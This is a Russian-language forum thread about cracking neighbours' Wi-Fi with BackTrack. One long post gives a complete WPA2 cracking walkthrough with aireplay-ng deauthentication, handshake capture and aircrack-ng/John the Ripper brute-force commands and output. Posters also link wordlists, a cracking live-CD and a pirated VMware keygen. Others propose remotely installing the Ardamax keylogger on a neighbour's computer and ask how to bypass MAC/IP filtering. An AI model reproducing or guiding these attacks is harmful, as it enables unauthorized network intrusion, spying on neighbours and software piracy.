Новая вышла. http://www.backtrack-linux.org/downloads/ Kernel 2.6.35.8 – *Much* improved mac80211 stack. USB 3.0 support. New wireless cards supported. All wireless Injection patches applied, maximum support for wireless attacks. Even *faster* desktop environment. Revamped Fluxbox environment for the KDE challenged. Metasploit rebuilt from scratch, MySQL db_drivers working out of the box. Updated old packages, added new ones, and removed obsolete ones. New BackTrack Wiki with better documentation and support. Our most professional, tested and streamlined release ever.
извените что отхожу от темы но может кейлоджер соседу закинуть?ардамакс например?на нем удаленная установка есть...тока я почту не знаю хорошую чтоб ардамакс на нее скидывал...на xaker.ru он отчеты присылает но на нем почту блокируют через неделю если на нее кейлоджер присылает...а так мне кажется кейлоджером можно узнать пароль от wi fi сети???если как так ее взломать предложений не у кого нет
Блин,где - то видел тему "Взлом Wi-Fi " или что - то такое,в поиске найти не могу,дайте ссылку.спасибо.
кая вот проблема у моего соседа имеется роутер у меня wi fi usb adapter. он мне дал свой пароль и я спокойно подключался кнему пару дней сегодня при попытке подключится ничего не происходит. хочу заметить что модем вобще не отвечает. как бы обьяснить..... вот обычьно при попытке подключения к роутеру хоть даже с неверным паролем иконка в трее становится зеленой и там пишет получение сетевого адреса в моем случае вобще ничего не происходит иконка красная как бы я вобще и не нажимал подключиться. p.s к другим сетям подключается нормально. извиняюсь за грамматику давно по русски не писал очень давно
А уровень сигнала слабее не стал? Мой dlink dwa110 при слабом сигнале отказывается вобще что либо делать. Но если уровень прежний, а подключения нет то вероятно твой мак адрес поместили в черный список. Поэтому у тебя даже ip не выдается и так далее.
автоматом чтоли роутер мак блокирет? я пробывал с двух комов и двух разных адаптеров у меня dlink dwa 140 i zixel g202 сигнал dlinка сигнал 53% c zyxeля 25 думаю сигнал не имеет значения(((
на мак самого роутера? потомучто мой друг подключаается через кабель к модему я единственный кто подключается через wi fi
кому напряжно пользоваться программами для взлома АП купитеhttp://www.wifirobin.com/free-network правда ломает только wep зато никаких заморочек никаких программ утанавливать не нужно(купил ,опробовал,всё работает как и утверждают проиводители)но мне интереснее самому.кто купит спрашивайте что и как ,сейчас сижу курочу эту штуку может что-то ещё вытащу. вот вам live-cd всего 45мб всё что нужно для взлома wi-fi никаких команд вводить не нужно,щёлкайте мышкой где нужно и всё, в архиве видео как им пользоваться. Commview рядом не стоял по сравнению с этим , поверьте.запишите образ на болванку или запускайте с VMware как я. http://turbobit.net/quet9unne87z.html да кто хочет VMware скачайте с оф.сайта а здесь кейген http://turbobit.net/mzlyk75d1dfe.html взлом WPA. Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0. Во-первых, поставить карту в режиме мониторинга: .................................................. ............. root@bt:~# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] .................................................. ............. root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0) .................................................. .............. Хорошо, теперь мы можем использовать интерфейс mon0 Давайте найдём беспроводную сеть, которая использует WPA2 / PSK .................................................. ............... root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet .................................................. ................... Остановим airodump-ng (ctrl+c) и запустим его снова,что-бы записать все пакеты на диск .................................................. ................... airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2 .................................................. ...................... На данный момент, у вас есть 2 варианта: либо ждать, пока клиент подключится и 4-handshake будет полным, или deauthenticate существующих клиентов и таким образом заставить AP reassociate. Время-деньги, так что давайте заставим силой deauthenticate. Мы должны запустить aireplay-ng введя BSSID ЗС (-а) и МАС подключенного клиента (-с) .................................................. ....................... root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs] .................................................. ........................... Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу .................................................. ............................ CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230 .................................................. .............................. Остановитe airodump-ng и убедитесь, что файлы были созданы правильно .................................................. ............................. root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv .................................................. .............................. Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени. Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt .................................................. .............................. aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap -------------------------------------------------------------------------------- Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования: .................................................. ................................ root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap .................................................. ............................... каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA ---------------------------------------------------------------------------------------------------------------- вот вам в помощь несколько словарей ComboFile http://turbobit.net/m15prul3v4vt.html de-ice.net-1.110-1.0 http://turbobit.net/8jsypdjdkctf.html de-ice.net-1.100-1.1 http://turbobit.net/ej38m25xhrmt.html de-ice.net-2.100-1.1.part1 http://turbobit.net/0g2yjp1y77df.html de-ice.net-2.100-1.1.part2 http://turbobit.net/7cbyz8sxarh7.html роутеры и модемы Password List 2010-02-04 http://turbobit.net/fomdazyfg5ou.html theargonlistver1 http://turbobit.net/kjf1h2eoyb46.html webster-dictionary http://turbobit.net/2xhh12xca0cy.html wpalist http://turbobit.net/700uk6nvpren.html это вам поможет создать свой словарь http://turbobit.net/u890gj1hortg.html http://turbobit.net/ybuhr008jhtj.html
да по поводу сигнала, мощность имеет огромное значение(не забывайте мощность сигнала и качество сигнала разные вещи)мощность может быть 90% а качество 30-40% тогда зацепить точку довольно сложно (отражённый сигнал и т.д.)точка не получает ваш запрос на подключение (на точке слабая антена,передатчик и т.д.)хотя вы её и видети,используйте для взлома хорошую антену и мощный адаптер.это 80% успеха.
ну как бы тебе сказать точьку я не ломаю а ключь мне дали подключался я неделю dlink dwa 140 rangebooster мощнее мне не надо. сегодня стоял от точьки на расстоянии 2 метра с ноутом нифига.
скажите, если я поставлю BT на vmware, я смогу сканировать вайфай сети? у меня встроенный адаптер, не усб, системой поддерживается.
Доброго времени суток! Подскажите пожалуйста почему при исполнении команды airodump-ng mon0 выдает ошибку ioctl(SIOCSIFFLAGS) failed: Unknown error 132, модуль Atheros AR 5007 EG снял с другого ноутбука, там все работало. (bt4 r2)
как используя систему backtrack 4 взломать точку где доступ в инетернет дается по определенным MAC и IP адрессам?
wi fi итак имею ноут toshiba satellite .вопрос: шо нить есть для ноутовского expresscard wifi карточка шоб wpa поиметь на линуксе?нашел такую но не знаю купить или нет хотя чип там atheros DLink DWA-643. ExpressCard/34. P.S. со встроенной картой поимел wep.всего 6 точек за 20-30 мин ось Beini 1.2